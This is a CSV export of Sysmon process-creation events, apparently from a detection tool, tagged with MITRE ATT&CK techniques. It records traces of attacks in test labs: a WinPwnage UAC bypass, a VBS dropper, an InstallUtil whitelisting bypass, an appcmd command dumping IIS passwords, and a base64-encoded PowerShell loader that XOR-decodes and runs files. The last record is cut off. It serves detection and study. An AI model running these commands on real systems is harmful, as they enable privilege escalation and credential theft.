[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
</TimeCreated>
<EventRecordID>6171</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ProcessId"">1536</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
</TimeCreated>
<EventRecordID>6171</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ProcessId"">1536</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:35.258262Z"">
</TimeCreated>
<EventRecordID>16245</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:35.070</Data>
<Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-0010306F2200</Data>
<Data Name=""ProcessId"">3752</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:03.589507Z"">
</TimeCreated>
<EventRecordID>16451</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:03.558</Data>
<Data Name=""ProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ProcessId"">3320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-252D-5CD8-0000-001019E20300</Data>
<Data Name=""ParentProcessId"">2800</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-11-26T17:38:11.175869Z"">
</TimeCreated>
<EventRecordID>2362770</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5900"" ThreadID=""6484"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-11-26 17:38:11.175</Data>
<Data Name=""ProcessGuid"">00247C92-E803-5FBF-0000-0010F2BFB40C</Data>
<Data Name=""ProcessId"">16980</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-3404-5FBE-0000-0020E0C90600</Data>
<Data Name=""LogonId"">0x6c9e0</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-E803-5FBF-0000-0010CDB9B40C</Data>
<Data Name=""ParentProcessId"">17336</Data>
<Data Name=""ParentImage"">C:\Windows\System32\taskhostw.exe</Data>
<Data Name=""ParentCommandLine"">taskhostw.exe $(Arg0)</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:22:05.691759Z"">
</TimeCreated>
<EventRecordID>7681</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:22:05.660</Data>
<Data Name=""ProcessGuid"">365ABB72-9C9D-5D04-0000-001039CE1600</Data>
<Data Name=""ProcessId"">172</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.8.7600.16385</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9C8E-5D04-0000-0010D0421600</Data>
<Data Name=""ParentProcessId"">540</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:13.214691Z"">
</TimeCreated>
<EventRecordID>4900</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:13.169</Data>
<Data Name=""ProcessGuid"">747F3D96-6619-5D3F-0000-0010FDE78600</Data>
<Data Name=""ProcessId"">5116</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.964573Z"">
</TimeCreated>
<EventRecordID>5973</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.924</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001072D7FF00</Data>
<Data Name=""ProcessId"">3640</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T13:50:29.459513Z"">
</TimeCreated>
<EventRecordID>5523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 13:50:28.662</Data>
<Data Name=""ProcessGuid"">747F3D96-9124-5D45-0000-00103B986101</Data>
<Data Name=""ProcessId"">6236</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
